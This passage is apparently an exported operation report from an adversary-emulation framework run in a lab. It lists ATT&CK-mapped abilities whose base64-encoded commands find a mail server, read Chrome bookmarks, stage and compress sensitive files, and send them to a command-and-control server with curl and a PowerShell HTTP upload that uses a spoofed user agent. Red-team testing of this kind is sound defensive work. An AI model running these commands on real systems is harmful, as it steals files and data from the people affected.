"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "ce485320-41a4-42e8-a510-f5a8fe96a644darwinsh",
"ability_id": "ce485320-41a4-42e8-a510-f5a8fe96a644",
"tactic": "discovery",
"technique_name": "Remote System Discovery",
"technique_id": "T1018",
"name": "Discover Mail Server",
"test": "aG9zdCAiI3t0YXJnZXQub3JnLmRvbWFpbn0iIHwgZ3JlcCBtYWlsIHwgZ3JlcCAtb0UgJ1teIF0rJCcgfCByZXYgfCBjdXQgLWMgMi0gfCByZXY=",
"description": "Identify the organizations mail server",
"cleanup": [],
"executor": "sh",
"unique": "ce485320-41a4-42e8-a510-f5a8fe96a644darwinsh",
"platform": "darwin",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "target.org.emailhost",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "ce485320-41a4-42e8-a510-f5a8fe96a644windowspsh",
"ability_id": "ce485320-41a4-42e8-a510-f5a8fe96a644",
"tactic": "discovery",
"technique_name": "Remote System Discovery",
"technique_id": "T1018",
"name": "Discover Mail Server",
"test": "KG5zbG9va3VwIC1xdWVyeXR5cGU9bXggI3t0YXJnZXQub3JnLmRvbWFpbn0uIHwgU2VsZWN0LVN0cmluZyAtcGF0dGVybiAnbWFpbCcgfCBPdXQtU3RyaW5nKS5UcmltKCk=",
"description": "Identify the organizations mail server",
"cleanup": [],
"executor": "psh",
"unique": "ce485320-41a4-42e8-a510-f5a8fe96a644windowspsh",
"platform": "windows",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "target.org.emailhost",
"edge": "",
"target": ""
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "b007fc38-9eb7-4320-92b3-9a3ad3e6ec25darwinsh",
"ability_id": "b007fc38-9eb7-4320-92b3-9a3ad3e6ec25",
"tactic": "discovery",
"technique_name": "Browser Bookmark Discovery",
"technique_id": "T1217",
"name": "Get Chrome Bookmarks",
"test": "Y2F0IH4vTGlicmFyeS9BcHBsaWNhdGlvblwgU3VwcG9ydC9Hb29nbGUvQ2hyb21lL0RlZmF1bHQvQm9va21hcmtz",
"description": "Get Chrome Bookmarks",
"cleanup": [],
"executor": "sh",
"unique": "b007fc38-9eb7-4320-92b3-9a3ad3e6ec25darwinsh",
"platform": "darwin",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.bookmarks",
"relationships": [
{
"source": "host.chrome.bookmark_title",
"edge": "resolves_to",
"target": "host.chrome.bookmark_url"
}
]
}
],
"requirements": [],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "4e97e699-93d7-4040-b5a3-2e906a58199edarwinsh",
"ability_id": "4e97e699-93d7-4040-b5a3-2e906a58199e",
"tactic": "collection",
"technique_name": "Data Staged",
"technique_id": "T1074",
"name": "Stage sensitive files",
"test": "Y3AgIiN7aG9zdC5maWxlLnBhdGhbZmlsdGVycyh0ZWNobmlxdWU9VDEwMDUsbWF4PTMpXX0iICN7aG9zdC5kaXIuc3RhZ2VkW2ZpbHRlcnMobWF4PTEpXX0=",
"description": "copy files to staging directory",
"cleanup": [],
"executor": "sh",
"unique": "4e97e699-93d7-4040-b5a3-2e906a58199edarwinsh",
"platform": "darwin",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.file.path",
"edge": "",
"target": "",
"score": 1
}
]
},
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "4e97e699-93d7-4040-b5a3-2e906a58199elinuxsh",
"ability_id": "4e97e699-93d7-4040-b5a3-2e906a58199e",
"tactic": "collection",
"technique_name": "Data Staged",
"technique_id": "T1074",
"name": "Stage sensitive files",
"test": "Y3AgIiN7aG9zdC5maWxlLnBhdGhbZmlsdGVycyh0ZWNobmlxdWU9VDEwMDUsbWF4PTMpXX0iICN7aG9zdC5kaXIuc3RhZ2VkW2ZpbHRlcnMobWF4PTEpXX0=",
"description": "copy files to staging directory",
"cleanup": [],
"executor": "sh",
"unique": "4e97e699-93d7-4040-b5a3-2e906a58199elinuxsh",
"platform": "linux",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.file.path",
"edge": "",
"target": "",
"score": 1
}
]
},
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "4e97e699-93d7-4040-b5a3-2e906a58199ewindowspsh",
"ability_id": "4e97e699-93d7-4040-b5a3-2e906a58199e",
"tactic": "collection",
"technique_name": "Data Staged",
"technique_id": "T1074",
"name": "Stage sensitive files",
"test": "Q29weS1JdGVtICN7aG9zdC5maWxlLnBhdGhbZmlsdGVycyh0ZWNobmlxdWU9VDEwMDUsbWF4PTMpXX0gI3tob3N0LmRpci5zdGFnZWRbZmlsdGVycyhtYXg9MSldfQ==",
"description": "copy files to staging directory",
"cleanup": [],
"executor": "psh",
"unique": "4e97e699-93d7-4040-b5a3-2e906a58199ewindowspsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.file.path",
"edge": "",
"target": "",
"score": 1
}
]
},
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "4e97e699-93d7-4040-b5a3-2e906a58199ewindowscmd",
"ability_id": "4e97e699-93d7-4040-b5a3-2e906a58199e",
"tactic": "collection",
"technique_name": "Data Staged",
"technique_id": "T1074",
"name": "Stage sensitive files",
"test": "Y29weSAje2hvc3QuZmlsZS5wYXRoW2ZpbHRlcnModGVjaG5pcXVlPVQxMDA1LG1heD0zKV19ICN7aG9zdC5kaXIuc3RhZ2VkW2ZpbHRlcnMobWF4PTEpXQ==",
"description": "copy files to staging directory",
"cleanup": [],
"executor": "cmd",
"unique": "4e97e699-93d7-4040-b5a3-2e906a58199ewindowscmd",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.file.path",
"edge": "",
"target": "",
"score": 1
}
]
},
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
}
],
"3": [
{
"id": "300157e5-f4ad-4569-b533-9d1fa0e74d74darwinsh",
"ability_id": "300157e5-f4ad-4569-b533-9d1fa0e74d74",
"tactic": "exfiltration",
"technique_name": "Data Compressed",
"technique_id": "T1002",
"name": "Compress staged directory",
"test": "dGFyIC1QIC16Y2YgI3tob3N0LmRpci5zdGFnZWR9LnRhci5neiAje2hvc3QuZGlyLnN0YWdlZH0gJiYgZWNobyAje2hvc3QuZGlyLnN0YWdlZH0udGFyLmd6",
"description": "Compress a directory on the file system",
"cleanup": [
"cm0gI3tob3N0LmRpci5zdGFnZWR9LnRhci5neg=="
],
"executor": "sh",
"unique": "300157e5-f4ad-4569-b533-9d1fa0e74d74darwinsh",
"platform": "darwin",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.dir.compress",
"edge": "",
"target": ""
}
]
}
],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "300157e5-f4ad-4569-b533-9d1fa0e74d74linuxsh",
"ability_id": "300157e5-f4ad-4569-b533-9d1fa0e74d74",
"tactic": "exfiltration",
"technique_name": "Data Compressed",
"technique_id": "T1002",
"name": "Compress staged directory",
"test": "dGFyIC1QIC16Y2YgI3tob3N0LmRpci5zdGFnZWR9LnRhci5neiAje2hvc3QuZGlyLnN0YWdlZH0gJiYgZWNobyAje2hvc3QuZGlyLnN0YWdlZH0udGFyLmd6",
"description": "Compress a directory on the file system",
"cleanup": [
"cm0gI3tob3N0LmRpci5zdGFnZWR9LnRhci5neg=="
],
"executor": "sh",
"unique": "300157e5-f4ad-4569-b533-9d1fa0e74d74linuxsh",
"platform": "linux",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.dir.compress",
"edge": "",
"target": ""
}
]
}
],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "300157e5-f4ad-4569-b533-9d1fa0e74d74windowspsh",
"ability_id": "300157e5-f4ad-4569-b533-9d1fa0e74d74",
"tactic": "exfiltration",
"technique_name": "Data Compressed",
"technique_id": "T1002",
"name": "Compress staged directory",
"test": "Q29tcHJlc3MtQXJjaGl2ZSAtUGF0aCAje2hvc3QuZGlyLnN0YWdlZH0gLURlc3RpbmF0aW9uUGF0aCAje2hvc3QuZGlyLnN0YWdlZH0uemlwIC1Gb3JjZTtzbGVlcCAxOyBscyAje2hvc3QuZGlyLnN0YWdlZH0uemlwIHwgZm9yZWFjaCB7JF8uRnVsbE5hbWV9IHwgc2VsZWN0",
"description": "Compress a directory on the file system",
"cleanup": [
"cm0gI3tob3N0LmRpci5zdGFnZWR9LnppcA=="
],
"executor": "psh",
"unique": "300157e5-f4ad-4569-b533-9d1fa0e74d74windowspsh",
"platform": "windows",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.dir.compress",
"edge": "",
"target": ""
}
]
}
],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "300157e5-f4ad-4569-b533-9d1fa0e74d74windowspwsh",
"ability_id": "300157e5-f4ad-4569-b533-9d1fa0e74d74",
"tactic": "exfiltration",
"technique_name": "Data Compressed",
"technique_id": "T1002",
"name": "Compress staged directory",
"test": "Q29tcHJlc3MtQXJjaGl2ZSAtUGF0aCAje2hvc3QuZGlyLnN0YWdlZH0gLURlc3RpbmF0aW9uUGF0aCAje2hvc3QuZGlyLnN0YWdlZH0uemlwIC1Gb3JjZTtzbGVlcCAxOyBscyAje2hvc3QuZGlyLnN0YWdlZH0uemlwIHwgZm9yZWFjaCB7JF8uRnVsbE5hbWV9IHwgc2VsZWN0",
"description": "Compress a directory on the file system",
"cleanup": [
"cm0gI3tob3N0LmRpci5zdGFnZWR9LnppcA=="
],
"executor": "pwsh",
"unique": "300157e5-f4ad-4569-b533-9d1fa0e74d74windowspwsh",
"platform": "windows",
"payload": "",
"parsers": [
{
"module": "plugins.stockpile.app.parsers.basic",
"relationships": [
{
"source": "host.dir.compress",
"edge": "",
"target": ""
}
]
}
],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.staged",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
}
],
"4": [
{
"id": "ea713bc4-63f0-491c-9a6f-0b01d560b87edarwinsh",
"ability_id": "ea713bc4-63f0-491c-9a6f-0b01d560b87e",
"tactic": "exfiltration",
"technique_name": "Exfiltration Over Command and Control Channel",
"technique_id": "T1041",
"name": "Exfil staged directory",
"test": "Y3VybCAtRiAiZGF0YT1AI3tob3N0LmRpci5jb21wcmVzc30iIC0taGVhZGVyICJYLVJlcXVlc3QtSUQ6IGBob3N0bmFtZWAtI3twYXd9IiAje3NlcnZlcn0vZmlsZS91cGxvYWQ=",
"description": "Exfil the staged directory",
"cleanup": [],
"executor": "sh",
"unique": "ea713bc4-63f0-491c-9a6f-0b01d560b87edarwinsh",
"platform": "darwin",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.compress",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "ea713bc4-63f0-491c-9a6f-0b01d560b87elinuxsh",
"ability_id": "ea713bc4-63f0-491c-9a6f-0b01d560b87e",
"tactic": "exfiltration",
"technique_name": "Exfiltration Over Command and Control Channel",
"technique_id": "T1041",
"name": "Exfil staged directory",
"test": "Y3VybCAtRiAiZGF0YT1AI3tob3N0LmRpci5jb21wcmVzc30iIC0taGVhZGVyICJYLVJlcXVlc3QtSUQ6IGBob3N0bmFtZWAtI3twYXd9IiAje3NlcnZlcn0vZmlsZS91cGxvYWQ=",
"description": "Exfil the staged directory",
"cleanup": [],
"executor": "sh",
"unique": "ea713bc4-63f0-491c-9a6f-0b01d560b87elinuxsh",
"platform": "linux",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.compress",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "ea713bc4-63f0-491c-9a6f-0b01d560b87ewindowspsh",
"ability_id": "ea713bc4-63f0-491c-9a6f-0b01d560b87e",
"tactic": "exfiltration",
"technique_name": "Exfiltration Over Command and Control Channel",
"technique_id": "T1041",
"name": "Exfil staged directory",
"test": "JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICdTdG9wJzskZmllbGROYW1lID0gJyN7aG9zdC5kaXIuY29tcHJlc3N9JzskZmlsZVBhdGggPSAnI3tob3N0LmRpci5jb21wcmVzc30nOyR1cmwgPSAiI3tzZXJ2ZXJ9L2ZpbGUvdXBsb2FkIjtBZGQtVHlwZSAtQXNzZW1ibHlOYW1lICdTeXN0ZW0uTmV0Lkh0dHAnOyRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuSHR0cC5IdHRwQ2xpZW50OyRjb250ZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0Lkh0dHAuTXVsdGlwYXJ0Rm9ybURhdGFDb250ZW50OyRmaWxlU3RyZWFtID0gW1N5c3RlbS5JTy5GaWxlXTo6T3BlblJlYWQoJGZpbGVQYXRoKTskZmlsZU5hbWUgPSBbU3lzdGVtLklPLlBhdGhdOjpHZXRGaWxlTmFtZSgkZmlsZVBhdGgpOyRmaWxlQ29udGVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5IdHRwLlN0cmVhbUNvbnRlbnQoJGZpbGVTdHJlYW0pOyRjb250ZW50LkFkZCgkZmlsZUNvbnRlbnQsICRmaWVsZE5hbWUsICRmaWxlTmFtZSk7JGNsaWVudC5EZWZhdWx0UmVxdWVzdEhlYWRlcnMuQWRkKCJYLVJlcXVlc3QtSWQiLCAkZW52OkNPTVBVVEVSTkFNRSArICctI3twYXd9Jyk7JGNsaWVudC5EZWZhdWx0UmVxdWVzdEhlYWRlcnMuQWRkKCJVc2VyLUFnZW50IiwiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzYwLjAuMzExMi4xMTMgU2FmYXJpLzUzNy4zNiIpOyRyZXN1bHQgPSAkY2xpZW50LlBvc3RBc3luYygkdXJsLCAkY29udGVudCkuUmVzdWx0OyRyZXN1bHQuRW5zdXJlU3VjY2Vzc1N0YXR1c0NvZGUoKTs=",
"description": "Exfil the staged directory",
"cleanup": [],
"executor": "psh",
"unique": "ea713bc4-63f0-491c-9a6f-0b01d560b87ewindowspsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.compress",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
},
{
"id": "ea713bc4-63f0-491c-9a6f-0b01d560b87ewindowspwsh",
"ability_id": "ea713bc4-63f0-491c-9a6f-0b01d560b87e",
"tactic": "exfiltration",
"technique_name": "Exfiltration Over Command and Control Channel",
"technique_id": "T1041",
"name": "Exfil staged directory",
"test": "JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICdTdG9wJzskZmllbGROYW1lID0gJyN7aG9zdC5kaXIuY29tcHJlc3N9JzskZmlsZVBhdGggPSAnI3tob3N0LmRpci5jb21wcmVzc30nOyR1cmwgPSAiI3tzZXJ2ZXJ9L2ZpbGUvdXBsb2FkIjtBZGQtVHlwZSAtQXNzZW1ibHlOYW1lICdTeXN0ZW0uTmV0Lkh0dHAnOyRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuSHR0cC5IdHRwQ2xpZW50OyRjb250ZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0Lkh0dHAuTXVsdGlwYXJ0Rm9ybURhdGFDb250ZW50OyRmaWxlU3RyZWFtID0gW1N5c3RlbS5JTy5GaWxlXTo6T3BlblJlYWQoJGZpbGVQYXRoKTskZmlsZU5hbWUgPSBbU3lzdGVtLklPLlBhdGhdOjpHZXRGaWxlTmFtZSgkZmlsZVBhdGgpOyRmaWxlQ29udGVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5IdHRwLlN0cmVhbUNvbnRlbnQoJGZpbGVTdHJlYW0pOyRjb250ZW50LkFkZCgkZmlsZUNvbnRlbnQsICRmaWVsZE5hbWUsICRmaWxlTmFtZSk7JGNsaWVudC5EZWZhdWx0UmVxdWVzdEhlYWRlcnMuQWRkKCJYLVJlcXVlc3QtSWQiLCAkZW52OkNPTVBVVEVSTkFNRSArICctI3twYXd9Jyk7JGNsaWVudC5EZWZhdWx0UmVxdWVzdEhlYWRlcnMuQWRkKCJVc2VyLUFnZW50IiwiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzYwLjAuMzExMi4xMTMgU2FmYXJpLzUzNy4zNiIpOyRyZXN1bHQgPSAkY2xpZW50LlBvc3RBc3luYygkdXJsLCAkY29udGVudCkuUmVzdWx0OyRyZXN1bHQuRW5zdXJlU3VjY2Vzc1N0YXR1c0NvZGUoKTs=",
"description": "Exfil the staged directory",
"cleanup": [],
"executor": "pwsh",
"unique": "ea713bc4-63f0-491c-9a6f-0b01d560b87ewindowspwsh",
"platform": "windows",
"payload": "",
"parsers": [],
"requirements": [
{
"module": "plugins.stockpile.app.requirements.paw_provenance",
"relationships": [
{
"source": "host.dir.compress",
"edge": "",
"target": "",
"score": 1
}
]
}
],
"privilege": "",
"timeout": 60,
"access": 1,
"variations": []
}
]
}
},
"jitter": "4/8",
"facts": [
{
"unique": "file.sensitive.extensionwav",
"trait": "file.sensitive.extension",
"value": "wav",
"score": 1,
"tactic": null
},
{
"unique": "file.sensitive.extensionyml",
"trait": "file.sensitive.extension",
"value": "yml",
"score": 1,
"tactic": null
},
{
"unique": "file.sensitive.extensionpng",
"trait": "file.sensitive.extension",
"value": "png",
"score": 1,
"tactic": null
},
{
"unique": "server.malicious.urlkeyloggedsite.com",
"trait": "server.malicious.url",
"value": "keyloggedsite.com",
"score": 1,
"tactic": null
},
{
"unique": "host.user.nameadministrator\r",
"trait": "host.user.name",
"value": "administrator\r",
"score": 1,
"tactic": "T1033"
},
{
"unique": "host.dir.stagedC:\\Users\\Administrator\\staged\r",
"trait": "host.dir.staged",
"value": "C:\\Users\\Administrator\\staged\r",
"score": 1,
"tactic": "T1074"
},
{
"unique": "domain.smb.shareC:\\Windows",
"trait": "domain.smb.share",
"value": "C:\\Windows",
"score": 1,
"tactic": "T1135"
},
{
"unique": "domain.smb.shareC:\\",
"trait": "domain.smb.share",
"value": "C:\\",
"score": 1,
"tactic": "T1135"
},
{
"unique": "domain.smb.shareMicrosoft.PowerShell.Core\\FileSystem::C:\\Windows\\SYSVOL\\sysvol\\attackrange.local\\SCRIPTS",
"trait": "domain.smb.share",
"value": "Microsoft.PowerShell.Core\\FileSystem::C:\\Windows\\SYSVOL\\sysvol\\attackrange.local\\SCRIPTS",
"score": 1,
"tactic": "T1135"
},
{
"unique": "domain.smb.shareC:\\Windows\\SYSVOL\\sysvol\\attackrange.local\\SCRIPTS",
"trait": "domain.smb.share",
"value": "C:\\Windows\\SYSVOL\\sysvol\\attackrange.local\\SCRIPTS",
"score": 1,
"tactic": "T1135"
},
{
"unique": "domain.smb.shareMicrosoft.PowerShell.Core\\FileSystem::C:\\Windows\\SYSVOL\\sysvol",
"trait": "domain.smb.share",
"value": "Microsoft.PowerShell.Core\\FileSystem::C:\\Windows\\SYSVOL\\sysvol",
"score": 1,
"tactic": "T1135"
},
{
"unique": "domain.smb.shareC:\\Windows\\SYSVOL\\sysvol",
"trait": "domain.smb.share",
"value": "C:\\Windows\\SYSVOL\\sysvol",
"score": 1,
"tactic": "T1135"
}
],
"skipped_abilities": [
{
"fasecd": [
{
"reason": "Wrong platform",
"reason_id": 0,
"ability_id": "c1cd6388-3ced-48c7-a511-0434c6ba8f48",
"ability_name": "Find local users"
},
{
"reason": "Wrong platform",
"reason_id": 0,
"ability_id": "b6f545ef-f802-4537-b59d-2cb19831c8ed",
"ability_name": "Snag broadcast IP"
},
{
"reason": "Fact dependency not fulfilled",
"reason_id": 2,
"ability_id": "ce485320-41a4-42e8-a510-f5a8fe96a644",
"ability_name": "Discover Mail Server"
},
{
"reason": "Wrong platform",
"reason_id": 0,
"ability_id": "b007fc38-9eb7-4320-92b3-9a3ad3e6ec25",
"ability_name": "Get Chrome Bookmarks"
},
{
"reason": "Fact dependency not fulfilled",
"reason_id": 2,
"ability_id": "4e97e699-93d7-4040-b5a3-2e906a58199e",
"ability_name": "Stage sensitive files"
},
{
"reason": "Fact dependency not fulfilled",
"reason_id": 2,
"ability_id": "ea713bc4-63f0-491c-9a6f-0b01d560b87e",
"ability_name": "Exfil staged directory"
}
]
}
]
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment